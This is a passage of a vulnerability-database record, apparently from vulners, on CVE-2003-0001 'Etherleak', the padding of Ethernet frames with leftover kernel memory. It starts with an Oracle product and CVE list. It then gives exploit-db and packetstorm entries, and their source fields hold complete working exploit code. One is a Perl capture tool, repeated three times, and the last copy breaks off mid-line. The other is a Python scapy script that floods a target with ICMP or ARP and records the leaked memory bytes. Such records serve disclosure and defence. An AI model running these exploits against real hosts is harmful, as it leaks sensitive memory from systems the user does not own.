"eq"}, {"name": "VirtualBox", "version": "4.3", "operator": "eq"}, {"name": "Oracle Directory Server", "version": "7.0", "operator": "eq"}, {"name": "MySQL Server", "version": "5.5", "operator": "eq"}, {"name": "Oracle Access Manager", "version": "11.1", "operator": "eq"}, {"name": "Fusion Middleware", "version": "10.1", "operator": "eq"}, {"name": "Solaris", "version": "11", "operator": "eq"}, {"name": "Oracle", "version": "11.1", "operator": "eq"}, {"name": "BI Publisher", "version": "11.1", "operator": "eq"}, {"name": "Fusion Middleware", "version": "12.1", "operator": "eq"}, {"name": "Solaris", "version": "10", "operator": "eq"}, {"name": "Oracle HTTP Server", "version": "11.1", "operator": "eq"}, {"name": "Oracle HTTP Server", "version": "12.1", "operator": "eq"}, {"name": "Fusion Applications", "version": "11.1", "operator": "eq"}, {"name": "Agile PLM", "version": "9.3", "operator": "eq"}, {"name": "JD Edwards EnterpriseOne Tool", "version": "9.1", "operator": "eq"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "eq"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "eq"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.1", "operator": "eq"}, {"name": "JRockit", "version": "28.3", "operator": "eq"}, {"name": "GlassFish Server", "version": "3.0", "operator": "eq"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "eq"}, {"name": "Oracle iLearning", "version": "6.1", "operator": "eq"}, {"name": "Communications Messaging Server", "version": "7.0", "operator": "eq"}], "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", "CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-6599", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2014-0114", "CVE-2015-0364", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", "CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "modified": "2015-01-25T00:00:00", "id": "SECURITYVULNS:VULN:14233", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14233", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:45:53", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Ethernet Device Drivers Frame Padding Info Leakage Exploit (Etherleak). CVE-2003-0001. Remote exploits for multiple platform", "reporter": "Jon Hart", "published": "2007-03-23T00:00:00", "type": "exploitdb", "title": "Ethernet Device Drivers Frame Padding - Info Leakage Exploit Etherleak", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-03-23T00:00:00", "id": "EDB-ID:3555", "href": "https://www.exploit-db.com/exploits/3555/", "sourceData": "#!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die \"Unknown option: $!\\n\" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_offline failed: $err\\n\");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR \"lookupdev() failed: $err\\n\");\r\n exit(1);\r\n } else {\r\n print(STDERR \"No interface specified. Using $iface\\n\");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_live failed on $iface: $err\\n\");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : \"\", 0, 0) == -1) {\r\n printf(\"Net::Pcap::compile failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf(\"Net::Pcap::setfilter failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf(\"Net::Pcap::dump_open failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, \"foo\");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf(\"Skipping datalink $datalink\\n\"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf(\"Skipping datalink $datalink l2 type %s\\n\", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = \"\";\r\n my $trailer_ascii = \"\";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf(\"%02x\", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= \".\"; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print(\"#\"x80, \"\\n\");\r\n printf(\"%s -> %s\\n\", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf(\"%s -> %s\\n\", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print(\"$trailer_hex\\t$trailer_ascii\\n\");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3555/"}, {"lastseen": "2016-02-03T02:48:02", "osvdbidlist": ["3873"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak. CVE-2003-0001. Dos exploit for hardware platform", "reporter": "prdelka", "published": "2013-06-10T00:00:00", "type": "exploitdb", "title": "Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2013-06-10T00:00:00", "id": "EDB-ID:26076", "href": "https://www.exploit-db.com/exploits/26076/", "sourceData": "#!/usr/bin/env python\r\n# CVE-2003-0001 'Etherleak' exploit\r\n# =================================\r\n# Exploit for hosts which use a network device driver that pads \r\n# ethernet frames with data which vary from one packet to another, \r\n# likely taken from kernel memory, system memory allocated to \r\n# the device driver, or a hardware buffer on its network interface \r\n# card. Exploit uses scapy with either ICMP or ARP requests as \r\n# this can trigger with either but ICMP can hit layer3 filtering \r\n# rules. Using ARP the padding appears to leak only fixed constant \r\n# values when exploited, ICMP leaks random bytes. \r\n#\r\n# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky\r\n# WARNING: No route found for IPv6 destination :: (no default route?)\r\n# [ CVE-2003-0001 'Etherleak' exploit\r\n# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex\r\n# ............................................................^C!Killing\r\n# !Killing\r\n# root@bt:~/0d# hexdump -C leaky | head\r\n# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..|\r\n# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.|\r\n# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2|\r\n# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p|\r\n# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.|\r\n# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.|\r\n# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|\r\n# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\\gl\"...+.9|\r\n# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\\D.=.|\r\n# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..|\r\n#\r\n# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference\r\n# is CSCua88376 and PSIRT-0669464365.\r\n#\r\n# -- prdelka\r\n#\r\nimport os\r\nimport sys\r\nimport signal\r\nimport binascii\r\nfrom scapy.all import *\r\n\r\ndef signalhandler(signal,id):\r\n\tprint \"!Killing\"\r\n\tsys.exit(0)\r\n\r\ndef spawn(host,type):\r\n\tif type == 'arp':\r\n\t\tsend(ARP(pdst=host),loop=1,nofilter=1)\r\n\telif type == 'icmp':\r\n\t\tsend(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)\t\t\r\n\r\nif __name__ == \"__main__\":\r\n\tprint \"[ CVE-2003-0001 'Etherleak' exploit\"\r\n\tsignal.signal(signal.SIGINT,signalhandler)\r\n\tif len(sys.argv) < 4:\r\n\t\tprint \"[ No! Use with <host> <arp|icmp> <file>\"\r\n\t\tsys.exit(1)\r\n\ttype = sys.argv[2]\r\n\tif type == 'arp':\r\n\t\tpass\r\n\telif type == 'icmp':\r\n\t\tpass\r\n\telse:\r\n\t\tprint \"Bad type!\"\r\n\t\tsys.exit(0)\r\n\tpid = os.fork()\r\n\tif(pid):\r\n\t\tprint \"[ Attacking %s for %s padding saved to %s.hex\" % (sys.argv[1],sys.argv[2],sys.argv[3])\r\n\t\tspawn(sys.argv[1],sys.argv[2])\r\n\twhile True:\r\n\t\tif type == 'arp':\r\n\t\t\tmyfilter = \"host %s and arp\" % sys.argv[1]\r\n\t\telif type == 'icmp':\r\n\t\t\tmyfilter = \"host %s and icmp\" % sys.argv[1]\r\n\t\tx = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))\r\n\t\tp = x[0]\r\n\t\tif type == 'arp':\r\n\t\t\tpad = p.getlayer(2)\r\n\t\tif type == 'icmp':\r\n\t\t\tpad = p.getlayer(4)\r\n\t\tleak = str(pad)\r\n\t\thexfull = binascii.b2a_hex(leak)\r\n\t\tfile = \"%s.hex\"%sys.argv[3]\r\n\t\tfdesc = open(file,\"a\")\r\n\t\tfdesc.write(hexfull + \"\\n\")\r\n\t\tfdesc.close()\r\n\t\t# 32 bits leaked here for me.\r\n\t\tif type == 'icmp':\r\n\t\t\tbytes = leak[9:13]\r\n\t\telif type == 'arp':\r\n\t\t\tbytes = leak[10:14]\r\n\t\tfdesc = open(sys.argv[3],\"ab\")\r\n\t\tfdesc.write(bytes)\r\n\t\tfdesc.close()", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/26076/"}, {"lastseen": "2016-02-02T18:02:41", "osvdbidlist": ["3873"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure. CVE-2003-0001. Remote exploit for unix platform", "reporter": "Jon Hart", "published": "2007-03-23T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-03-23T00:00:00", "id": "EDB-ID:22131", "href": "https://www.exploit-db.com/exploits/22131/", "sourceData": "source: http://www.securityfocus.com/bid/6535/info\r\n\r\nNetwork device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.\r\n\r\nFrames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.\r\n\r\nCisco has stated that the IOS 12.1 and 12.2 trains are not affected.\r\n\r\nNational Semiconductor Ethernet controller chips are not vulnerable to this issue. \r\n\r\n#!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die \"Unknown option: $!\\n\" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_offline failed: $err\\n\");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR \"lookupdev() failed: $err\\n\");\r\n exit(1);\r\n } else {\r\n print(STDERR \"No interface specified. Using $iface\\n\");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_live failed on $iface: $err\\n\");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : \"\", 0, 0) == -1) {\r\n printf(\"Net::Pcap::compile failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf(\"Net::Pcap::setfilter failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf(\"Net::Pcap::dump_open failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, \"foo\");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf(\"Skipping datalink $datalink\\n\"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf(\"Skipping datalink $datalink l2 type %s\\n\", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = \"\";\r\n my $trailer_ascii = \"\";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf(\"%02x\", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= \".\"; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print(\"#\"x80, \"\\n\");\r\n printf(\"%s -> %s\\n\", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf(\"%s -> %s\\n\", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print(\"$trailer_hex\\t$trailer_ascii\\n\");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/22131/"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:02", "references": [], "description": "", "edition": 1, "reporter": "Jon Hart", "published": "2007-03-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "etherleak.txt", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "modified": "2007-03-24T00:00:00", "href": "https://packetstormsecurity.com/files/55335/etherleak.txt.html", "id": "PACKETSTORM:55335", "sourceData": "`#!/usr/bin/perl -w \n# etherleak, code that has been 5 years coming. \n# \n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list, \n# a vulnerability that would be come known as the 'etherleak' bug. In \n# various situations an ethernet frame must be padded to reach a specific \n# size or fall on a certain boundary. This task is left up to the driver \n# for the ethernet device. The RFCs state that this padding must consist \n# of NULLs. The bug is that at the time and still to this day, many device \n# drivers do not pad will NULLs, but rather pad with unsanitized portions \n# of kernel memory, oftentimes exposing sensitive information to remote \n# systems or those savvy enough to coerce their targets to do so. \n# \n# Proof of this can be found by googling for 'warchild and etherleak', or \n# by visiting: \n# \n# http://lkml.org/lkml/2002/4/27/101 \n# \n# This was ultimately fixed in the Linux kernel, but over time this \n# vulnerability reared its head numerous times, but at the core the \n# vulnerability was the same as the one I originally published. The most \n# public of these was CVE-2003-0001, which was assigned to address an \n# official @stake advisory. \n# \n# This code can be found its most current form at: \n# \n# http://spoofed.org/files/exploits/etherleak \n# \n# Jon Hart <jhart@spoofed.org>, March 2007 \n# \n \nuse strict; \nuse diagnostics; \nuse warnings; \nuse Getopt::Long; \nuse Net::Pcap; \nuse NetPacket::Ethernet qw(:ALL); \nuse NetPacket::IP qw(:ALL); \n \nmy %opts = (); \nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \n \nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or \ndie \"Unknown option: $!\\n\" && &usage(); \n \nif (defined($opts{'help'})) { \n&usage(); \nexit(0); \n} \n \nif (defined($opts{'read'})) { \n$pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err); \nif (!defined($pcap_t)) { \nprint(\"Net::Pcap::open_offline failed: $err\\n\"); \nexit 1; \n} \n} else { \nif (defined($opts{'interface'})) { \n$iface = $opts{'interface'}; \n} else { \n$iface = Net::Pcap::lookupdev(\\$err); \nif (defined($err)) { \nprint(STDERR \"lookupdev() failed: $err\\n\"); \nexit(1); \n} else { \nprint(STDERR \"No interface specified. Using $iface\\n\"); \n} \n} \n \n$pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err); \nif (!defined($pcap_t)) { \nprint(\"Net::Pcap::open_live failed on $iface: $err\\n\"); \nexit 1; \n} \n} \n \nmy $filter; \nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : \"\", 0, 0) == -1) { \nprintf(\"Net::Pcap::compile failed: %s\\n\", Net::Pcap::geterr($pcap_t)); \nexit(1); \n} \n \nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) { \nprintf(\"Net::Pcap::setfilter failed: %s\\n\", Net::Pcap::geterr($pcap_t)); \nexit(1); \n} \n \nif (defined($opts{'write'})) { \n$pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'}); \nif 